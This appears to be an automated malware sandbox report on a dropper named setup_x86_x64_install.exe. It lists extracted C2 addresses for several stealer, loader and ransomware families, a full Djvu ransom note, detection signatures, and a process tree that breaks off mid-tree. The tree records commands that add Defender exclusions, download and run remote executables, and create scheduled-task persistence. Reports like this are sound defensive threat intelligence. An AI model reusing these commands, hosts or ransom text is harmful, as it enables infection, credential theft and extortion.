Resubmissions

28-03-2022 07:58

220328-jty77adcdp 10

25-03-2022 09:29

220325-lf232adhh3 1

25-03-2022 09:16

220325-k8tfxsaddl 10

24-03-2022 20:10

220324-yx6trsdgg5 1

21-03-2022 09:00

220321-kyfgbaafh9 10

21-03-2022 08:57

220321-kw1dpsafg5 4

20-03-2022 10:09

220320-l64pjscaen 10

19-03-2022 11:38

220319-nr4gcaghhr 10

Analysis

  • max time kernel
    847s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10-20220310-en
  • submitted
    17-03-2022 18:18

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.2MB

  • MD5

    d2f0cfac1c354f041c7b243f3df94d0a

  • SHA1

    dfc03d06e799018485dc2dd72f997a0fef3d83a1

  • SHA256

    3faadb2356253a3c76b42691c13dd3c05b0df75fbf543041bd7afc478b9a838c

  • SHA512

    ed4b434001a16e0d81d59a5be9a26d31be8fb518ddc9e98dd22ca031761ab88ec9d4d479f11b2c0febfb90960061159836c806952d9e0c5cf9239654a5b7e6d6

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

vidar

Version

40.6

Botnet

706

C2

https://dimonbk83.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine 1 IoCs
  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars 2 IoCs
  • Socelars Payload 2 IoCs
  • Vidar 2 IoCs
  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Djvu 3 IoCs
  • OnlyLogger Payload 1 IoCs
  • Smokeloader2018 1 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 48 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 18 IoCs
  • Obfuscated with Agile.Net obfuscator 3 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 31 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:1344
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2908
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3936
            • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02705f9c2b455.exe
              Tue02705f9c2b455.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2056
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe
            4⤵
              PID:3204
              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue026e94a5005f8.exe
                Tue026e94a5005f8.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:3668
                • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue026e94a5005f8.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue026e94a5005f8.exe
                  6⤵
                  • Executes dropped EXE
                  PID:4408
                • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue026e94a5005f8.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue026e94a5005f8.exe
                  6⤵
                  • Executes dropped EXE
                  PID:4496
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue0289c99651.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2968
              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue0289c99651.exe
                Tue0289c99651.exe
                5⤵
                • Executes dropped EXE
                PID:216
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2372
              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue029560e6534e190c.exe
                Tue029560e6534e190c.exe
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                PID:4064
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 932
                  6⤵
                  • Program crash
                  PID:4112
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1996
              • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue026e182673.exe
                Tue026e182673.exe /mixone
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: GetForegroundWindowSpam
                PID:2308
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 656
                  6⤵
                  • Program crash
                  PID:4172
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 688
                  6⤵
                  • Program crash
                  PID:4288
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 692
                  6⤵
                  • Program crash
                  PID:4316
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 788
                  6⤵
                  • Program crash
                  PID:4392
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 840
                  6⤵
                  • Program crash
                  PID:4448
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 896
                  6⤵
                  • Program crash
                  PID:4572
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 1140
                  6⤵
                  • Program crash
                  PID:4608
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 1312
                  6⤵
                  • Program crash
                  PID:4644
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 1276
                  6⤵
                  • Program crash
                  PID:4684
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 592
                  6⤵
                  • Program crash
                  PID:3908
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 724
                  6⤵
                  • Program crash
                  PID:4408
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 756
                  6⤵
                  • Program crash
                  PID:4248
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe
              4⤵
                PID:528
                • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02b2110095fe706.exe
                  Tue02b2110095fe706.exe
                  5⤵
                  • Executes dropped EXE
                  PID:224
                  • C:\Users\Admin\AppData\Local\Temp\is-1KENS.tmp\Tue02b2110095fe706.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-1KENS.tmp\Tue02b2110095fe706.tmp" /SL5="$80068,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02b2110095fe706.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3604
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Tue02dc626f48.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1404
                • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02dc626f48.exe
                  Tue02dc626f48.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4072
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    6⤵
                      PID:4076
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        7⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2264
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:836
                  • C:\Users\Admin\AppData\Local\Temp\7zS8A81FA9D\Tue02520f255d0ba43a.exe
                    Tue02520f255d0ba43a.exe
                    5⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    PID:188
                    • C:\Users\Admin\Pictures\Adobe Films\LyJ5ziYJui9Wl0yVg4jXPQjI.exe
                      "C:\Users\Admin\Pictures\Adobe Films\LyJ5ziYJui9Wl0yVg4jXPQjI.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4208
                    • C:\Users\Admin\Pictures\Adobe Films\RO4dxYJIQIOMb30tX9_8Oxka.exe
                      "C:\Users\Admin\Pictures\Adobe Films\RO4dxYJIQIOMb30tX9_8Oxka.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:5072
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\9F09.bat "C:\Users\Admin\Pictures\Adobe Films\RO4dxYJIQIOMb30tX9_8Oxka.exe""
                        7⤵
                          PID:4484
                          • C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                            8⤵
                              PID:1344
                            • C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe
                              C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/4460_1647529798_1063.exe" "4460_1647529798_1063.exe" "" "" "" "" "" ""
                              8⤵
                              • Executes dropped EXE
                              PID:4076
                            • C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe
                              C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/1245_1647445154_9529.exe" "1245_1647445154_9529.exe" "" "" "" "" "" ""
                              8⤵
                              • Executes dropped EXE
                              PID:4648
                            • C:\Users\Admin\AppData\Local\Temp\10194\4460_1647529798_1063.exe
                              4460_1647529798_1063.exe
                              8⤵
                                PID:2708
                              • C:\Users\Admin\AppData\Local\Temp\10194\1245_1647445154_9529.exe
                                1245_1647445154_9529.exe
                                8⤵
                                  PID:4896
                                • C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\9F07.tmp\9F08.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                  8⤵
                                    PID:1036
                              • C:\Users\Admin\Pictures\Adobe Films\d1vI8FhGYushd0CTdnJxAUc9.exe
                                "C:\Users\Admin\Pictures\Adobe Films\d1vI8FhGYushd0CTdnJxAUc9.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                PID:5100
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c timeout 35
                                  7⤵
                                    PID:2236
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout 35
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:4516
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    7⤵
                                      PID:4844
                                      • C:\Users\Admin\AppData\Local\Temp\a.exe
                                        "C:\Users\Admin\AppData\Local\Temp\a.exe"
                                        8⤵
                                          PID:200
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMQA1AA==
                                            9⤵
                                              PID:4056
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c timeout 15
                                                10⤵
                                                  PID:4320
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout 15
                                                    11⤵
                                                    • Delays execution with timeout.exe
                                                    PID:1572
                                              • C:\Users\Admin\AppData\Local\Temp\a.exe
                                                C:\Users\Admin\AppData\Local\Temp\a.exe
                                                9⤵
                                                  PID:944
                                              • C:\Users\Admin\AppData\Local\Temp\b.exe
                                                "C:\Users\Admin\AppData\Local\Temp\b.exe"
                                                8⤵
                                                  PID:4924
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMQA1AA==
                                                    9⤵
                                                      PID:3000
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c timeout 15
                                                        10⤵
                                                          PID:4552
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout 15
                                                            11⤵
                                                            • Delays execution with timeout.exe
                                                            PID:4116
                                                      • C:\Users\Admin\AppData\Local\Temp\b.exe
                                                        C:\Users\Admin\AppData\Local\Temp\b.exe
                                                        9⤵
                                                          PID:3616
                                                          • C:\Windows\explorer.exe
                                                            "C:\Windows\explorer.exe"
                                                            10⤵
                                                              PID:4572
                                                              • C:\Windows\system32\ctfmon.exe
                                                                ctfmon.exe
                                                                11⤵
                                                                  PID:3552
                                                                • C:\Windows\system32\ctfmon.exe
                                                                  ctfmon.exe
                                                                  11⤵
                                                                    PID:188
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" SADAX 5.206.227.37 3389 HsNhXgbVg
                                                                  10⤵
                                                                    PID:4648
                                                                  • C:\Windows\SysWOW64\ComputerDefaults.exe
                                                                    "C:\Windows\System32\ComputerDefaults.exe"
                                                                    10⤵
                                                                      PID:3360
                                                                • C:\Users\Admin\AppData\Local\Temp\c.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\c.exe"
                                                                  8⤵
                                                                    PID:2828
                                                                    • C:\Windows\system32\WerFault.exe
                                                                      C:\Windows\system32\WerFault.exe -u -p 2828 -s 224
                                                                      9⤵
                                                                      • Program crash
                                                                      PID:4068
                                                              • C:\Users\Admin\Pictures\Adobe Films\ErU8kLP6vQAQvsvnxr5z_6f6.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\ErU8kLP6vQAQvsvnxr5z_6f6.exe"
                                                                6⤵
                                                                  PID:1220
                                                                  • C:\Users\Admin\Pictures\Adobe Films\ErU8kLP6vQAQvsvnxr5z_6f6.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\ErU8kLP6vQAQvsvnxr5z_6f6.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4976
                                                                • C:\Users\Admin\Pictures\Adobe Films\l0SfazLiCNK9Xka932fpAeZO.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\l0SfazLiCNK9Xka932fpAeZO.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4040
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    "C:\Windows\System32\svchost.exe"
                                                                    7⤵
                                                                      PID:1556
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                                                                      7⤵
                                                                        PID:1360
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd
                                                                          8⤵
                                                                            PID:1984
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist /FI "imagename eq BullGuardCore.exe"
                                                                              9⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:4648
                                                                            • C:\Windows\SysWOW64\find.exe
                                                                              find /I /N "bullguardcore.exe"
                                                                              9⤵
                                                                                PID:3200
                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                                9⤵
                                                                                • Enumerates processes with tasklist
                                                                                PID:2708
                                                                              • C:\Windows\SysWOW64\find.exe
                                                                                find /I /N "psuaservice.exe"
                                                                                9⤵
                                                                                  PID:5020
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  PID:4132
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                                  Sta.exe.pif V
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:2268
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4688
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 472
                                                                                      11⤵
                                                                                      • Program crash
                                                                                      PID:1972
                                                                                • C:\Windows\SysWOW64\waitfor.exe
                                                                                  waitfor /t 5 MsGxuGavEVaQbserVWhrA
                                                                                  9⤵
                                                                                    PID:5012
                                                                            • C:\Users\Admin\Pictures\Adobe Films\3QTG5OuAjc8ZPlqQ4kVb5CFC.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\3QTG5OuAjc8ZPlqQ4kVb5CFC.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4432
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 420
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:2680
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 392
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:1540
                                                                            • C:\Users\Admin\Pictures\Adobe Films\aqWfYeCnEs9lZZYq7dXsEkVf.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\aqWfYeCnEs9lZZYq7dXsEkVf.exe"
                                                                              6⤵
                                                                                PID:4136
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 660
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4076
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 692
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:5080
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 692
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:1092
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 708
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:2240
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1132
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4000
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1152
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:1308
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1164
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:1128
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1244
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4328
                                                                              • C:\Users\Admin\Pictures\Adobe Films\GbKdK_BZIkeRMhEork4MGqfb.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\GbKdK_BZIkeRMhEork4MGqfb.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:1960
                                                                              • C:\Users\Admin\Pictures\Adobe Films\MI9g40SpsmC5dDPvIiNSJH9t.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\MI9g40SpsmC5dDPvIiNSJH9t.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:3908
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 420
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4792
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 440
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:5088
                                                                              • C:\Users\Admin\Pictures\Adobe Films\jdfGrI_nB7_1EA1zlQr74lJI.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\jdfGrI_nB7_1EA1zlQr74lJI.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:1460
                                                                              • C:\Users\Admin\Pictures\Adobe Films\btvM79jcawpDXtYTVr0XAlzh.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\btvM79jcawpDXtYTVr0XAlzh.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:1224
                                                                              • C:\Users\Admin\Pictures\Adobe Films\f5wXbK8F2ws8Z23nBSg2AlT4.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\f5wXbK8F2ws8Z23nBSg2AlT4.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:4032
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                  7⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4944
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                  7⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4924
                                                                              • C:\Users\Admin\Pictures\Adobe Films\66nV1z8js65ISs1L9XAA7pXA.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\66nV1z8js65ISs1L9XAA7pXA.exe"
                                                                                6⤵
                                                                                  PID:4132
                                                                                  • C:\Windows\SysWOW64\cmd.exe
